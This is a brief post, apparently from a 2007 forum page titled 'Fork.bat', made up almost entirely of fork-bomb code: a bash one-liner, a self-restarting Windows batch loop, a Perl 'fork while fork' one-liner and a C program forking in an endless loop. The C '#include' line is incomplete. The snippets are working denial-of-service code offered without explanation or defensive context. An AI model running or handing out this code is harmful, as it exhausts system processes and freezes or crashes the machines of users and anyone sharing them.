Fork.bat
2007-01-23 17:06:04 UTC
:(){ :|:& };:
Or in Microsoft Windows using a batch file:
:s
start %0
goto s
Or using Perl:
(forking using the Perl interpreter):
perl -e "fork while fork" &
Or in C:
#include
int main(void)
{
while(1) {
fork();
}
return 0;
}